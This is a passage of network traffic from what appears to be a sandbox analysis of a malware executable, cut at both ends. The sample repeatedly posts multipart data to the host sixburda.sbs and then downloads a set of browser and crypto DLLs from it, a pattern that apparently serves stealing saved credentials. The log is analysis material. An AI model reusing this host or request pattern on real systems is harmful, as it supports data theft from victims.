                            Accept: */*
                            User-Agent: Microsoft-CryptoAPI/10.0
                            Host: c.pki.goog
                            Response
                            HTTP/1.1 200 OK
                            Accept-Ranges: bytes
                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                            Cross-Origin-Resource-Policy: cross-origin
                            Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                            Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                            Content-Length: 436
                            X-Content-Type-Options: nosniff
                            Server: sffe
                            X-XSS-Protection: 0
                            Date: Fri, 01 Nov 2024 04:06:08 GMT
                            Expires: Fri, 01 Nov 2024 04:56:08 GMT
                            Cache-Control: public, max-age=3000
                            Age: 1892
                            Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                            Content-Type: application/pkix-crl
                            Vary: Accept-Encoding
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 256
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bgv3CPe03Ao5cTLvOglig4h0h7lko17x3DA58DBWef3WGUxFhn84ipEKKX4%2FCzjC5q49Ti2Gf3XkSWuvlQSfCMFRisCgBkBRZEEcziAE1VFkKzFMrSa7LQpbJjGO3dQ%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930e11c9193f4-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20520&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1026&delivery_rate=66288&cwnd=250&unsent_bytes=0&cid=f91c5cce83400f6a&ts=429&x=0"
                          • flag-us
                            DNS
                            41.249.124.192.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            41.249.124.192.in-addr.arpa
                            IN PTR
                            Response
                            41.249.124.192.in-addr.arpa
                            IN PTR
                            cloudproxy10041.sucuri.net
                          • flag-us
                            DNS
                            185.74.21.104.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            185.74.21.104.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            227.187.250.142.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            227.187.250.142.in-addr.arpa
                            IN PTR
                            Response
                            227.187.250.142.in-addr.arpa
                            IN PTR
                            lhr25s34-in-f3.1e100.net
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFqsKxumJ9HUvBgDLpQ4clyyQKjRrIpLZnat%2BF7QXzrCkaNUey%2B8N1TbZL26%2BLDDfT2tDhSD84C2vivtkKeeHTyiei5O7iDdTGhLMj85ef7NCLNlgMtpQE49g2CT1zk%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930e40ebc48cd-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20141&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=67717&cwnd=250&unsent_bytes=0&cid=7e46e3c517dc5438&ts=440&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 331
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPTULkShpAFtJ4x0oB7SHX39LdmIZa%2F5WAwDF%2FQfXv7PJpEcxYYYLdt5BiA6kSj8MNWcfxQ%2BiRKfM8ZXioAJoF4lJkYJTPniqUA3igT%2B9KwkM8ZQhoxtW1%2BkiySK%2BaU%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930e70a3393e0-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20866&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1101&delivery_rate=66095&cwnd=244&unsent_bytes=0&cid=c36a11e694d553b6&ts=445&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 332
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJbuDIi4MRo9x0Dr71aWBZllrqAL7fx6y9b5r4rbArxCD2%2BiVpY074a3ijG%2Fhs5GnGlUKB%2BGXoD09WM4YCqXbwj%2F3kw3M5d2PFymyNTUlL4rmn3UbbPGgAu6dZe6nJo%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930ea1eed60e7-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20794&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1102&delivery_rate=65813&cwnd=241&unsent_bytes=0&cid=403df075156e0e92&ts=445&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 4853
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6B70qZu4J35cfz0b0HDtx5ubAR4oUeWADwYBqqfgeabtywpwb6S80d8DMxkaZqALlZGfkKimhwxIxcGvgWA01zE7Y%2BgZPddRCa0Gt4DM9LsOrdD%2Ba2GyduLJtx6qr6k%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930ee68de94c3-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=21738&sent=4&recv=10&lost=0&retrans=0&sent_bytes=115&recv_bytes=5653&delivery_rate=60677&cwnd=250&unsent_bytes=0&cid=dc64563b4e71456b&ts=651&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/sqlo.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /sqlo.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:43 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 2459136
                            Connection: keep-alive
                            Last-Modified: Wed, 30 Oct 2024 06:48:20 GMT
                            ETag: "6721d6b4-258600"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYzuMGsvbpGg5RCmxAKva%2BXHUFWXAh2wPaEnvA8An8wCG8Vf31J0dMoHxivyf3Infh0lWJ3vI3Q6WcBkQxD7IF3vyT9jmrV3MVuVSlqFE93YEXN3p%2FFQf2poMHtCTC8%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db930f29cc3cd25-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=21762&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=686&delivery_rate=62893&cwnd=250&unsent_bytes=0&cid=e78f001747acb960&ts=97&x=0"
                          • flag-us
                            DNS
                            www.google.com
                            chrome.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            www.google.com
                            IN A
                            Response
                            www.google.com
                            IN A
                            142.250.180.4
                          • flag-us
                            DNS
                            ogads-pa.googleapis.com
                            chrome.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            ogads-pa.googleapis.com
                            IN A
                            Response
                            ogads-pa.googleapis.com
                            IN A
                            216.58.213.10
                            ogads-pa.googleapis.com
                            IN A
                            216.58.201.106
                            ogads-pa.googleapis.com
                            IN A
                            142.250.187.234
                            ogads-pa.googleapis.com
                            IN A
                            142.250.200.42
                            ogads-pa.googleapis.com
                            IN A
                            142.250.187.202
                            ogads-pa.googleapis.com
                            IN A
                            216.58.212.234
                            ogads-pa.googleapis.com
                            IN A
                            142.250.200.10
                            ogads-pa.googleapis.com
                            IN A
                            142.250.179.234
                            ogads-pa.googleapis.com
                            IN A
                            172.217.169.74
                            ogads-pa.googleapis.com
                            IN A
                            142.250.180.10
                            ogads-pa.googleapis.com
                            IN A
                            172.217.16.234
                            ogads-pa.googleapis.com
                            IN A
                            216.58.204.74
                            ogads-pa.googleapis.com
                            IN A
                            142.250.178.10
                          • flag-us
                            DNS
                            apis.google.com
                            chrome.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            apis.google.com
                            IN A
                            Response
                            apis.google.com
                            IN CNAME
                            plus.l.google.com
                            plus.l.google.com
                            IN A
                            172.217.16.238
                          • flag-us
                            DNS
                            3.180.250.142.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            3.180.250.142.in-addr.arpa
                            IN PTR
                            Response
                            3.180.250.142.in-addr.arpa
                            IN PTR
                            lhr25s32-in-f3.1e100.net
                          • flag-us
                            DNS
                            234.179.250.142.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            234.179.250.142.in-addr.arpa
                            IN PTR
                            Response
                            234.179.250.142.in-addr.arpa
                            IN PTR
                            lhr25s31-in-f10.1e100.net
                          • flag-us
                            DNS
                            238.16.217.172.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            238.16.217.172.in-addr.arpa
                            IN PTR
                            Response
                            238.16.217.172.in-addr.arpa
                            IN PTR
                            mad08s04-in-f14.1e100.net
                            238.16.217.172.in-addr.arpa
                            IN PTR
                            lhr48s28-in-f14.1e100.net
                          • flag-us
                            DNS
                            10.213.58.216.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            10.213.58.216.in-addr.arpa
                            IN PTR
                            Response
                            10.213.58.216.in-addr.arpa
                            IN PTR
                            lhr25s25-in-f10.1e100.net
                            10.213.58.216.in-addr.arpa
                            IN PTR
                            ber01s14-in-f10.1e100.net
                          • flag-us
                            DNS
                            play.google.com
                            chrome.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            play.google.com
                            IN A
                            Response
                            play.google.com
                            IN A
                            172.217.16.238
                          • flag-us
                            DNS
                            133.211.185.52.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            133.211.185.52.in-addr.arpa
                            IN PTR
                            Response
                          • flag-us
                            DNS
                            clients2.google.com
                            chrome.exe
                            Remote address:
                            8.8.8.8:53
                            Request
                            clients2.google.com
                            IN A
                            Response
                            clients2.google.com
                            IN CNAME
                            clients.l.google.com
                            clients.l.google.com
                            IN A
                            216.58.204.78
                          • flag-us
                            DNS
                            78.204.58.216.in-addr.arpa
                            Remote address:
                            8.8.8.8:53
                            Request
                            78.204.58.216.in-addr.arpa
                            IN PTR
                            Response
                            78.204.58.216.in-addr.arpa
                            IN PTR
                            lhr25s13-in-f78.1e100.net
                            78.204.58.216.in-addr.arpa
                            IN PTR
                            lhr25s13-in-f14.1e100.net
                            78.204.58.216.in-addr.arpa
                            IN PTR
                            lhr48s49-in-f14.1e100.net
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 1113
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PdZoO4QcUVdafidZA7w6eXnxUkSxtYe8x5qz4N%2B4Rvud8OR7eq06A65eBE1tqcDcqee2lWjfhqN1E2TCpyTeCYs%2BO3cqSwlGe4cUTRam1apv%2BZvFKQfDO9Q%2FI7F8pnY%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9312f1aec88a3-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=23876&sent=5&recv=7&lost=0&retrans=0&sent_bytes=115&recv_bytes=1913&delivery_rate=62396&cwnd=250&unsent_bytes=0&cid=207cc66f709d21be&ts=731&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJD
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 437
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2B3%2FEZ%2FLAGK%2FmLPv9X1w1%2BsgYYP9JnRgSvNJUO99lxBJkKHN6RSaCkYg7mVflX6RUIbCTE6jEtZlE0upOzIbJ9T5Fkk97AmKKuctggsdqyVtXEtrkdLUXMxtsruSuCc%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db93133e885407e-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1207&delivery_rate=60933&cwnd=250&unsent_bytes=0&cid=f643fba5e3573f45&ts=680&x=0"
                          • flag-us
                            POST
                            https://sixburda.sbs/
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Content-Length: 437
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhfZH%2FgJcBJ11kFOuLDirCemGrYq5djHT4MWCKO%2BqBanerZLUa3AmzHGU49OVAGywXhxF%2Fmq3AYhsFdqhFogEK1kJqemFjnFu%2FkxtboNRbwG3WT8GpUz06NE%2Bp%2F7M%2FU%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931393ed94142-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20593&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=1207&delivery_rate=61486&cwnd=250&unsent_bytes=0&cid=c203b77b607e7af7&ts=701&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/freebl3.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /freebl3.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:55 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 685392
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-a7550"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrCGAgHs4ADkijuYzC0cP2mzhuPHR5oeJMK1LIhVS%2FjiplUIox2yRyLhI2QydcH8wKzFG3z%2FfcepIGFnZQgQ20kKUMtLnMS6BWkQ9YJ6uykNIXamx0HDmGwSftlVNCM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9313e2b207698-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=23081&sent=4&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=689&delivery_rate=59648&cwnd=250&unsent_bytes=0&cid=6bb4c70e2c7ef6e8&ts=135&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/mozglue.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /mozglue.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:55 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 608080
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-94750"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7ZS8V9WYhkw%2FAQ1bYa07n9PpbKBjBgDTQygJPfLWeMzBN2NoVIvASVGOBWjWIiAL4PhlS1QkdJfrRumNUwKR3LTW%2FBSbkeURathqNKgB9R3D9DKJTKc%2FLebAOj1YCo%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db9313feeb563a8-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20841&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=689&delivery_rate=66807&cwnd=249&unsent_bytes=0&cid=decb2652a2768ddb&ts=57&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/msvcp140.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /msvcp140.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:56 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 450024
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-6dde8"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDFEZtO3jBVU%2BYpMugTiDVGjbA2SHzdOOItm520y02oClRIcY%2B7bXOZZdeL%2BxxtW9t93a4AQpVN7UzBHd%2BRmuoVOaYbQ5sOHWP2Qfk0wRBWmv0zC9T8Mjp3w1F1uyg0%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931419ee860de-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20957&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=690&delivery_rate=65121&cwnd=250&unsent_bytes=0&cid=f5c0c50edab4bb18&ts=83&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/softokn3.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /softokn3.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:56 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 257872
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-3ef50"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSYhJpRbXvIozjzBXTZRAcJrlJLT%2Ft02cNt9Pm89PP61le7NEy8ov7I4SDhjigd5lAIccCV1%2BGbhZo0fMzQATWJIEcMIK5pFo5oefC%2FGWHOCBQD0hhTsrPSgQ4u967g%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931431ce8955d-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20513&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=690&delivery_rate=65065&cwnd=250&unsent_bytes=0&cid=fc34bc7f215dfea6&ts=80&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/vcruntime140.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /vcruntime140.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:56 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 80880
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-13bf0"
                            Accept-Ranges: bytes
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSDr8aK0hB8vvWyYkVFe%2BmFkPqGef8gPJSvmfyKg3WPFPKcmhrVlrGEydYc7NH0KAazQClC%2BpLY5nvkynll6Pe6zYyhRopFYE%2BtOYHBKvcKdkklxHIxnQgXjYMkIhOQ%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8db931448a26496d-LHR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=20416&sent=3&recv=6&lost=0&retrans=0&sent_bytes=115&recv_bytes=694&delivery_rate=67809&cwnd=250&unsent_bytes=0&cid=b06b6378408c5aac&ts=80&x=0"
                          • flag-us
                            GET
                            https://sixburda.sbs/nss3.dll
                            9726ba5e1a7ad8c6f0351c147e9aa9a477cd7aca12f00363260d979ca6a9688b.exe
                            Remote address:
                            104.21.74.185:443
                            Request
                            GET /nss3.dll HTTP/1.1
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: sixburda.sbs
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Response
                            HTTP/1.1 200 OK
                            Date: Fri, 01 Nov 2024 04:37:56 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 2046288
                            Connection: keep-alive
                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                            ETag: "6315a9f4-1f3950"
